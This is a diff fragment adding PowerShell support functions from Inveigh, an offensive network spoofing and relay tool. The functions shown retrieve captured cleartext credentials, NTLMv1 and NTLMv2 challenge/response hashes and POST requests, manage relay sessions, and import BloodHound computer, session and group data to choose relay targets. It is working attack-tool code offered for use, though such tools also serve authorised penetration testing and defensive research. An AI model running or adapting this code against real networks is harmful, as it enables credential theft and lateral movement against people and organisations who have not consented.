$NTLMv2_username_list_temp = $inveigh.NTLMv2_username_list + + foreach($NTLMv2_username in $NTLMv2_username_list_temp) + { + Write-Output($NTLMv2_username + $inveigh.newline) + } + + } + else + { + Write-Output("[+] [$(Get-Date -format s)] No NTLMv2 challenge/response hashes have been captured" + $inveigh.newline) + } + + $console_status_stopwatch = [System.Diagnostics.Stopwatch]::StartNew() + } + + if($inveigh.console_input) + { + + if([Console]::KeyAvailable) + { + $inveigh.console_output = $false + BREAK console_loop + } + + } + + Start-Sleep -m 5 + } + + } + +} +finally +{ + + if($Tool -eq 2) + { + $inveigh.running = $false + } + +} + +} +#endregion +#region begin support functions +function Stop-Inveigh +{ +<# +.SYNOPSIS +Stop-Inveigh will stop all running Inveigh functions. +#> + + if($inveigh) + { + $inveigh.stop = $true + + if($inveigh.running -or $inveigh.relay_running) + { + $inveigh.console_queue.Clear() + Watch-Inveigh -NoConsoleMessage + Start-Sleep -S 2 + } + else + { + Write-Output "[-] There are no running Inveigh functions" + } + + } + +} + +function Get-Inveigh +{ +<# +.SYNOPSIS +Get-Inveigh will get stored Inveigh data from memory. + +.PARAMETER Console +Get queued console output. This is also the default if no parameters are set. + +.PARAMETER ADIDNS +Get added DNS host records. + +.PARAMETER ADIDNSFailed +Get failed DNS host record adds. + +.PARAMETER Learning +Get valid hosts discovered through spoofer learning. + +.PARAMETER Log +Get log entries. + +.PARAMETER Cleartext +Get captured cleartext credentials. + +.PARAMETER CleartextUnique +Get unique captured cleartext credentials. + +.PARAMETER NTLMv1 +Get captured NTLMv1 challenge/response hashes. + +.PARAMETER NTLMv1Unique +Get the first captured NTLMv1 challenge/response for each unique account. + +.PARAMETER NTLMv1Usernames +Get IP addresses and usernames for captured NTLMv1 challenge/response hashes. + +.PARAMETER NTLMv2 +Get captured NTLMv1 challenge/response hashes. + +.PARAMETER NTLMv2Unique +Get the first captured NTLMv2 challenge/response for each unique account. + +.PARAMETER NTLMv2Usernames +Get IP addresses and usernames for captured NTLMv2 challenge/response hashes. + +.PARAMETER POSTRequest +Get captured POST requests. + +.PARAMETER POSTRequestUnique +Get unique captured POST request. + +.PARAMETER Session +Get relay session list. +#> + + [CmdletBinding()] + param + ( + [parameter(Mandatory=$false)][Switch]$Cleartext, + [parameter(Mandatory=$false)][Switch]$CleartextUnique, + [parameter(Mandatory=$false)][Switch]$Console, + [parameter(Mandatory=$false)][Switch]$ADIDNS, + [parameter(Mandatory=$false)][Switch]$ADIDNSFailed, + [parameter(Mandatory=$false)][Switch]$Learning, + [parameter(Mandatory=$false)][Switch]$Log, + [parameter(Mandatory=$false)][Switch]$NTLMv1, + [parameter(Mandatory=$false)][Switch]$NTLMv2, + [parameter(Mandatory=$false)][Switch]$NTLMv1Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv2Unique, + [parameter(Mandatory=$false)][Switch]$NTLMv1Usernames, + [parameter(Mandatory=$false)][Switch]$NTLMv2Usernames, + [parameter(Mandatory=$false)][Switch]$POSTRequest, + [parameter(Mandatory=$false)][Switch]$POSTRequestUnique, + [parameter(Mandatory=$false)][Switch]$Session, + [parameter(Mandatory=$false)][Switch]$Enumerate, + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter + ) + + if($Console -or $PSBoundParameters.Count -eq 0) + { + + while($inveigh.console_queue.Count -gt 0) + { + + if($inveigh.output_stream_only) + { + Write-Output($inveigh.console_queue[0] + $inveigh.newline) + $inveigh.console_queue.RemoveAt(0) + } + else + { + + switch -wildcard ($inveigh.console_queue[0]) + { + + {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"} + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + default + { + Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + } + + } + + } + + } + + if($ADIDNS) + { + $ADIDNS_table_keys_temp = $inveigh.ADIDNS_table.Keys + + foreach($ADIDNS_host in $ADIDNS_table_keys_temp) + { + + if($inveigh.ADIDNS_table.$ADIDNS_host -eq 1) + { + Write-Output $ADIDNS_host + } + + } + + } + + if($ADIDNSFailed) + { + + $ADIDNS_table_keys_temp = $inveigh.ADIDNS_table.Keys + + foreach($ADIDNS_host in $ADIDNS_table_keys_temp) + { + + if($inveigh.ADIDNS_table.$ADIDNS_host -eq 0) + { + Write-Output $ADIDNS_host + } + + } + + } + + if($Log) + { + Write-Output $inveigh.log + } + + if($NTLMv1) + { + Write-Output $inveigh.NTLMv1_list + } + + if($NTLMv1Unique) + { + $inveigh.NTLMv1_list.Sort() + $NTLMv1_list_temp = $inveigh.NTLMv1_list + + foreach($unique_NTLMv1 in $NTLMv1_list_temp) + { + $unique_NTLMv1_account = $unique_NTLMv1.SubString(0,$unique_NTLMv1.IndexOf(":",($unique_NTLMv1.IndexOf(":") + 2))) + + if($unique_NTLMv1_account -ne $unique_NTLMv1_account_last) + { + Write-Output $unique_NTLMv1 + } + + $unique_NTLMv1_account_last = $unique_NTLMv1_account + } + + } + + if($NTLMv1Usernames) + { + Write-Output $inveigh.NTLMv2_username_list + } + + if($NTLMv2) + { + Write-Output $inveigh.NTLMv2_list + } + + if($NTLMv2Unique) + { + $inveigh.NTLMv2_list.Sort() + $NTLMv2_list_temp = $inveigh.NTLMv2_list + + foreach($unique_NTLMv2 in $NTLMv2_list_temp) + { + $unique_NTLMv2_account = $unique_NTLMv2.SubString(0,$unique_NTLMv2.IndexOf(":",($unique_NTLMv2.IndexOf(":") + 2))) + + if($unique_NTLMv2_account -ne $unique_NTLMv2_account_last) + { + Write-Output $unique_NTLMv2 + } + + $unique_NTLMv2_account_last = $unique_NTLMv2_account + } + + } + + if($NTLMv2Usernames) + { + Write-Output $inveigh.NTLMv2_username_list + } + + if($Cleartext) + { + Write-Output $inveigh.cleartext_list + } + + if($CleartextUnique) + { + Write-Output $inveigh.cleartext_list | Get-Unique + } + + if($POSTRequest) + { + Write-Output $inveigh.POST_request_list + } + + if($POSTRequestUnique) + { + Write-Output $inveigh.POST_request_list | Get-Unique + } + + if($Learning) + { + Write-Output $inveigh.valid_host_list + } + + if($Session) + { + $i = 0 + + while($i -lt $inveigh.session_socket_table.Count) + { + + if(!$inveigh.session_socket_table[$i].Connected) + { + $inveigh.session[$i] | Where-Object {$_.Status = "disconnected"} + } + + $i++ + } + + Write-Output $inveigh.session | Format-Table -AutoSize + } + + if($Enumerate) + { + Write-Output $inveigh.enumerate + } + +} + +function Watch-Inveigh +{ +<# +.SYNOPSIS +Watch-Inveigh will enabled real time console output. If using this function through a shell, test to ensure that it doesn't hang the shell. + +.PARAMETER ConsoleOutput +(Medium,Low) Medium and Low can be used to reduce output. +#> + +[CmdletBinding()] +param +( + [parameter(Mandatory=$false)][Switch]$NoConsoleMessage, + [parameter(Mandatory=$false)][ValidateSet("Low","Medium","Y")][String]$ConsoleOutput = "Y", + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter +) + +if($inveigh.tool -ne 1) +{ + + if($inveigh.running -or $inveigh.relay_running) + { + + if(!$NoConsoleMessage) + { + Write-Output "[*] Press any key to stop console output" + } + + $inveigh.console_output = $true + + :console_loop while((($inveigh.running -or $inveigh.relay_running) -and $inveigh.console_output) -or ($inveigh.console_queue.Count -gt 0 -and $inveigh.console_output)) + { + + while($inveigh.console_queue.Count -gt 0) + { + + switch -wildcard ($inveigh.console_queue[0]) + { + + {$_ -like "?`[`!`]*" -or $_ -like "?`[-`]*"} + { + Write-Warning $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + {$_ -like "* spoofer is disabled" -or $_ -like "* local request" -or $_ -like "* host header *" -or $_ -like "* user agent received *"} + { + + if($ConsoleOutput -eq 'Y') + { + Write-Output $inveigh.console_queue[0] + } + + $inveigh.console_queue.RemoveAt(0) + + } + + {$_ -like "* response sent" -or $_ -like "* ignoring *" -or $_ -like "* HTTP*request for *" -or $_ -like "* Proxy request for *"} + { + + if($ConsoleOutput -ne "Low") + { + Write-Output $inveigh.console_queue[0] + } + + $inveigh.console_queue.RemoveAt(0) + + } + + default + { + Write-Output $inveigh.console_queue[0] + $inveigh.console_queue.RemoveAt(0) + } + + } + + } + + if([Console]::KeyAvailable) + { + $inveigh.console_output = $false + BREAK console_loop + } + + Start-Sleep -m 5 + } + + } + else + { + Write-Output "[-] Inveigh isn't running" + } + +} +else +{ + Write-Output "[-] Watch-Inveigh cannot be used with current external tool selection" +} + +} + +function Clear-Inveigh +{ +<# +.SYNOPSIS +Clear-Inveigh will clear Inveigh data from memory. +#> + +if($inveigh) +{ + + if(!$inveigh.running -and !$inveigh.relay_running) + { + Remove-Variable inveigh -scope global + Write-Output "[+] Inveigh data has been cleared from memory" + } + else + { + Write-Output "[-] Run Stop-Inveigh before running Clear-Inveigh" + } + +} + +} + +function ConvertTo-Inveigh +{ + <# + .SYNOPSIS + ConvertTo-Inveigh imports Bloodhound computers, groups and session JSON files into $inveigh.enumerate + for Inveigh Relay targeting. + + .DESCRIPTION + For the fastest import, import the data before gather any enumeration data with Inveigh. + + .PARAMETER BloodHoundComputersJSON + BloodHound computers file. + + .PARAMETER BloodHoundSessionsJSON + BloodHound sessions file. + + .PARAMETER BloodHoundGroupsJSON + BloodHound groups file. + + .PARAMTER DNS + Enable DNS lookups + #> + + [CmdletBinding()] + param + ( + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$Computers, + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$Sessions, + [parameter(Mandatory=$false)][ValidateScript({Test-Path $_})][String]$Groups, + [parameter(Mandatory=$false)][Switch]$DNS, + [parameter(ValueFromRemainingArguments=$true)]$invalid_parameter + ) + + if(!$Computers -and !$Sessions -and !$Groups) + { + Write-Output "Specifiy a BloodHound computers, groups, or sessions JSON file" + throw + } + + if($inveigh.running -or $inveigh.relay_running) + { + Write-Output "Run Stop-Inveigh before importing data with ConvertTo-Inveigh" + throw + } + + if(!$inveigh) + { + $global:inveigh = [HashTable]::Synchronized(@{}) + $inveigh.cleartext_list = New-Object System.Collections.ArrayList + $inveigh.enumerate = New-Object System.Collections.ArrayList + $inveigh.IP_capture_list = New-Object System.Collections.ArrayList + $inveigh.log = New-Object System.Collections.ArrayList + $inveigh.NTLMv1_list = New-Object System.Collections.ArrayList + $inveigh.NTLMv1_username_list = New-Object System.Collections.ArrayList + $inveigh.NTLMv2_list = New-Object System.Collections.ArrayList + $inveigh.NTLMv2_username_list = New-Object System.Collections.ArrayList + $inveigh.POST_request_list = New-Object System.Collections.ArrayList + $inveigh.valid_host_list = New-Object System.Collections.ArrayList + $inveigh.ADIDNS_table = [HashTable]::Synchronized(@{}) + $inveigh.relay_failed_login_table = [HashTable]::Synchronized(@{}) + $inveigh.relay_history_table = [HashTable]::Synchronized(@{}) + $inveigh.request_table = [HashTable]::Synchronized(@{}) + $inveigh.session_socket_table = [HashTable]::Synchronized(@{}) + $inveigh.session_table = [HashTable]::Synchronized(@{}) + $inveigh.session_message_ID_table = [HashTable]::Synchronized(@{}) + $inveigh.session_lock_table = [HashTable]::Synchronized(@{}) + $inveigh.SMB_session_table = [HashTable]::Synchronized(@{}) + $inveigh.domain_mapping_table = [HashTable]::Synchronized(@{}) + $inveigh.group_table = [HashTable]::Synchronized(@{}) + $inveigh.session_count = 0 + $inveigh.session = @() + } + + function New-RelayEnumObject + { + param ($IP,$Hostname,$DNSDomain,$netBIOSDomain,$Sessions,$AdministratorUsers,$AdministratorGroups, + $Privileged,$Shares,$NetSessions,$NetSessionsMapped,$LocalUsers,$SMB2,$Signing,$SMBServer,$DNSRecord, + $IPv6Only,$Targeted,$Enumerate,$Execute) + + if($Sessions -and $Sessions -isnot [Array]){$Sessions = @($Sessions)} + if($AdministratorUsers -and $AdministratorUsers -isnot [Array]){$AdministratorUsers = @($AdministratorUsers)} + if($AdministratorGroups -and $AdministratorGroups -isnot [Array]){$AdministratorGroups = @($AdministratorGroups)} + if($Privileged -and $Privileged -isnot [Array]){$Privileged = @($Privileged)} + if($Shares -and $Shares -isnot [Array]){$Shares = @($Shares)} + if($NetSessions -and $NetSessions -isnot [Array]){$NetSessions = @($NetSessions)} + if($NetSessionsMapped -and $NetSessionsMapped -isnot [Array]){$NetSessionsMapped = @($NetSessionsMapped)} + if($LocalUsers -and $LocalUsers -isnot [Array]){$LocalUsers = @($LocalUsers)} + + $relay_object = New-Object PSObject + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Index" $inveigh.enumerate.Count + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "IP" $IP + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Hostname" $Hostname + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "DNS Domain" $DNSDomain + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "netBIOS Domain" $netBIOSDomain + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Sessions" $Sessions + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Users" $AdministratorUsers + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Administrator Groups" $AdministratorGroups + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Privileged" $Privileged + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Shares" $Shares + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions" $NetSessions + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "NetSessions Mapped" $NetSessionsMapped + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Local Users" $LocalUsers + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB2.1" $SMB2 + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Signing" $Signing + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "SMB Server" $SMBServer + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "DNS Record" $DNSRecord + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "IPv6 Only" $IPv6Only + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Targeted" $Targeted + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Enumerate" $Enumerate + Add-Member -InputObject $relay_object -MemberType NoteProperty -Name "Execute" $Execute + + return $relay_object + } + + function Get-DNSEntry([String]$hostname) + { + + try + { + $IP_list = [System.Net.Dns]::GetHostEntry($hostname) + + foreach($entry in $IP_list.AddressList) + { + + if(!$entry.IsIPv6LinkLocal) + { + $IP = $entry.IPAddressToString + } + + } + + } + catch + { + $IP = $null + } + + return $IP + } + + # JSON parsing from http://wahlnetwork.com/2016/03/15/deserializing-large-json-payloads-powershell-objects/ + function Invoke-ParseItem($JSONItem) + { + + if($JSONItem.PSObject.TypeNames -match 'Array') + { + return Invoke-ParseJsonArray($JSONItem) + } + elseif($JSONItem.PSObject.TypeNames -match 'Dictionary') + { + return Invoke-ParseJsonObject([HashTable]$JSONItem) + } + else + { + return $JSONItem + } + + } + + function Invoke-ParseJsonObject($JSONObject) + { + $result = New-Object -TypeName PSCustomObject + + foreach($key in $JSONObject.Keys) + { + $item = $JSONObject[$key] + + if ($item) + { + $parsed_item = Invoke-ParseItem $item + } + else + { + $parsed_item = $null + } + + $result | Add-Member -MemberType NoteProperty -Name $key -Value $parsed_item + } + + return $result + } + + function Invoke-ParseJSONArray($JSONArray) + { + $result = @() + $stopwatch_progress = [System.Diagnostics.Stopwatch]::StartNew() + $i = 0 + + $JSONArray | ForEach-Object -Process { + + if($stopwatch_progress.Elapsed.TotalMilliseconds -ge 500) + { + $percent_complete_calculation = [Math]::Truncate($i / $JSONArray.count * 100) + + if($percent_complete_calculation -le 100) + { + Write-Progress -Activity "Parsing JSON" -Status "$percent_complete_calculation% Complete:" -PercentComplete $percent_complete_calculation -ErrorAction SilentlyContinue + } + + $stopwatch_progress.Reset() + $stopwatch_progress.Start() + } + + $i++ + $result += , (Invoke-ParseItem $_)} + + return $result + } + + function Invoke-ParseJSONString($json) + { + $config = $javaScriptSerializer.DeserializeObject($json) + + return Invoke-ParseJsonObject $config + } + + [void][System.Reflection.Assembly]::LoadWithPartialName("System.Web.Extensions") + + if($inveigh.enumerate.Count -eq 0) + { + $enumerate_empty = $true + } + + if($Computers) + { + $Computers = (Resolve-Path $Computers).Path + $computers_serializer = New-Object -TypeName System.Web.Script.Serialization.JavaScriptSerializer + $computers_serializer.MaxJsonLength = 104857600 + $bloodhound_computers = [System.IO.File]::ReadAllText($Computers) + $bloodhound_computers = $computers_serializer.DeserializeObject($bloodhound_computers) + Write-Output "[*] Parsing BloodHound Computers JSON" + $stopwatch_parse = [System.Diagnostics.Stopwatch]::StartNew() + $bloodhound_computers = Invoke-ParseItem $bloodhound_computers + Write-Output "[+] Parsing completed in $([Math]::Truncate($stopwatch_parse.Elapsed.TotalSeconds)) seconds" + $stopwatch_parse.Reset() + $stopwatch_parse.Start() + Write-Output "[*] Importing computers to Inveigh" + $stopwatch_progress = [System.Diagnostics.Stopwatch]::StartNew() + $i = 0 + + if(!$bloodhound_computers.Computers) + { + Write-Output "[!] JSON computers parse failed" + throw + } + + $bloodhound_computers.Computers | ForEach-Object { + + if($stopwatch_progress.Elapsed.TotalMilliseconds -ge 500) + { + $percent_complete_calculation = [Math]::Truncate($i / $bloodhound_computers.Computers.Count * 100) + + if($percent_complete_calculation -le 100) + { + Write-Progress -Activity "[*] Importing computers" -Status "$percent_complete_calculation% Complete:" -PercentComplete $percent_complete_calculation -ErrorAction SilentlyContinue + } + + $stopwatch_progress.Reset() + $stopwatch_progress.Start() + } + + $hostname = $_.Name + [Array]$local_admin_users = $_.LocalAdmins | Where-Object {$_.Type -eq 'User'} | Select-Object -expand Name + [Array]$local_admin_groups = $_.LocalAdmins | Where-Object {$_.Type -eq 'Group'} | Select-Object -expand Name + + if($DNS) + { + $IP = Get-DNSEntry $hostname + + if(!$IP) + { + Write-Output "[-] DNS lookup for $Hostname failed" + } + + } + + if(!$enumerate_empty) + { + + for($i = 0;$i -lt $inveigh.enumerate.Count;$i++) + { + + if(($hostname -and $inveigh.enumerate[$i].Hostname -eq $hostname) -or ($IP -and $inveigh.enumerate[$i].IP -eq $IP)) + { + + if($inveigh.enumerate[$i].Hostname -ne $hostname -and $inveigh.enumerate[$i].IP -eq $IP) + { + + for($j = 0;$j -lt $inveigh.enumerate.Count;$j++) + { + + if($inveigh.enumerate[$j].IP -eq $target) + { + $target_index = $j + break + } + + } + + $inveigh.enumerate[$target_index].Hostname = $hostname + } + else + { + + for($j = 0;$j -lt $inveigh.enumerate.Count;$j++) + { + + if($inveigh.enumerate[$j].Hostname -eq $hostname) + { + $target_index = $j + break + } + + } + + } + + $inveigh.enumerate[$target_index]."Administrator Users" = $local_admin_users + $inveigh.enumerate[$target_index]."Administrator Groups" = $local_admin_groups + } + else + { + $inveigh.enumerate.Add((New-RelayEnumObject -Hostname $_.Name -IP $IP -AdministratorUsers $local_admin_users -AdministratorGroups $local_admin_groups)) > $null + } + + } + + } + else + { + $inveigh.enumerate.Add((New-RelayEnumObject -Hostname $_.Name -IP $IP -AdministratorUsers $local_admin_users -AdministratorGroups $local_admin_groups)) > $null + } + + $IP = $null + $hostname = $null + $local_admin_users = $null + $local_admin_groups = $null + $target_index = $null + $i++ + } + + Write-Output "[+] Import completed in $([Math]::Truncate($stopwatch_parse.Elapsed.TotalSeconds)) seconds" + $stopwatch_parse.Reset() + Remove-Variable bloodhound_computers + } + + if($Sessions) + { + $Sessions = (Resolve-Path $Sessions).Path + $sessions_serializer = New-Object -TypeName System.Web.Script.Serialization.JavaScriptSerializer + $sessions_serializer.MaxJsonLength = 104857600 + $bloodhound_sessions = [System.IO.File]::ReadAllText($Sessions) + $bloodhound_sessions = $sessions_serializer.DeserializeObject($bloodhound_sessions) + $stopwatch_parse = [System.Diagnostics.Stopwatch]::StartNew() + Write-Output "[*] Parsing BloodHound Sessions JSON" + $bloodhound_sessions = Invoke-ParseItem $bloodhound_sessions + Write-Output "[+] Parsing completed in $([Math]::Truncate($stopwatch_parse.Elapsed.TotalSeconds)) seconds" + $stopwatch_parse.Reset() + $stopwatch_parse.Start() + Write-Output "[*] Importing sessions to Inveigh" + $stopwatch_progress = [System.Diagnostics.Stopwatch]::StartNew() + $i = 0 + + if(!$bloodhound_sessions.Sessions) + { + Write-Output "[!] JSON sessions parse failed" + throw + } + + $bloodhound_sessions.Sessions | ForEach-Object { + + if($stopwatch_progress.Elapsed.TotalMilliseconds -ge 500) + { + $percent_complete_calculation = [Math]::Truncate($i / $bloodhound_sessions.Sessions.Count * 100) + + if($percent_complete_calculation -le 100) + { + Write-Progress -Activity "[*] Importing sessions" -Status "$percent_complete_calculation% Complete:" -PercentComplete $percent_complete_calculation -ErrorAction SilentlyContinue + } + + $stopwatch_progress.Reset() + $stopwatch_progress.Start() + } + + $hostname = $_.ComputerName + + if($hostname -as [IPAddress] -as [Bool]) + { + $IP = $hostname + $hostname = $null + + for($i = 0;$i -lt $inveigh.enumerate.Count;$i++) + { + + if($inveigh.enumerate[$i].IP -eq $target) + { + $target_index = $i + break + } + + } + + } + else + { + for($i = 0;$i -lt $inveigh.enumerate.Count;$i++) + { + + if($inveigh.enumerate[$i].Hostname -eq $hostname) + { + $target_index = $i + break + } + + } + + if($DNS) + { + $IP = Get-DNSEntry $hostname + + if(!$IP) + { + Write-Output "[-] DNS lookup for $Hostname failed or IPv6 address" + } + + } + + } + + if(!$enumerate_empty -or $target_index -ge 0) + { + [Array]$session_list = $inveigh.enumerate[$target_index].Sessions + + if($session_list -notcontains $_.UserName) + { + $session_list += $_.UserName + $inveigh.enumerate[$target_index].Sessions = $session_list + } + + } + else + { + $inveigh.enumerate.Add($(New-RelayEnumObject -Hostname $hostname -IP $IP -Sessions $_.UserName)) > $null + } + + $hostname = $null + $IP = $null + $session_list = $null + $target_index = $null + $i++ + } + + Write-Output "[+] Import completed in $([Math]::Truncate($stopwatch_parse.Elapsed.TotalSeconds)) seconds" + $stopwatch_parse.Reset() + Remove-Variable bloodhound_sessions + } + + if($Groups) + { + $Groups = (Resolve-Path $Groups).Path + $groups_serializer = New-Object -TypeName System.Web.Script.Serialization.JavaScriptSerializer + $groups_serializer.MaxJsonLength = 104857600 + $bloodhound_groups = [System.IO.File]::ReadAllText($Groups) + $bloodhound_groups = $groups_serializer.DeserializeObject($bloodhound_groups) + $stopwatch_parse = [System.Diagnostics.Stopwatch]::StartNew() + Write-Output "[*] Parsing BloodHound Groups JSON" + $bloodhound_groups = Invoke-ParseItem $bloodhound_groups + Write-Output "[+] Parsing completed in $([Math]::Truncate($stopwatch_parse.Elapsed.TotalSeconds)) seconds" + $stopwatch_parse.Reset() + $stopwatch_parse.Start() + Write-Output "[*] Importing groups to Inveigh" + $stopwatch_progress = [System.Diagnostics.Stopwatch]::StartNew() + $i = 0 + + if(!$bloodhound_groups.Groups) + { + Write-Output "[!] JSON groups parse failed" + throw + } + + $bloodhound_groups.Groups | ForEach-Object { + + if($stopwatch_progress.Elapsed.TotalMilliseconds -ge 500) + { + $percent_complete_calculation = [Math]::Truncate($i / $bloodhound_groups.Groups.Count * 100) + + if($percent_complete_calculation -le 100) + { + Write-Progress -Activity "[*] Importing groups" -Status "$percent_complete_calculation% Complete:" -PercentComplete $percent_complete_calculation -ErrorAction SilentlyContinue + } + + $stopwatch_progress.Reset() + $stopwatch_progress.Start() + } + + [Array]$group_members = $_.Members | Select-Object -expand MemberName + $inveigh.group_table.Add($_.Name,$group_members) + $group_members = $null + $i++ + } + + Write-Output "[+] Import completed in $([Math]::Truncate($stopwatch.Elapsed.TotalSeconds)) seconds" + } + +} + +#endregion
\ No newline at end of file |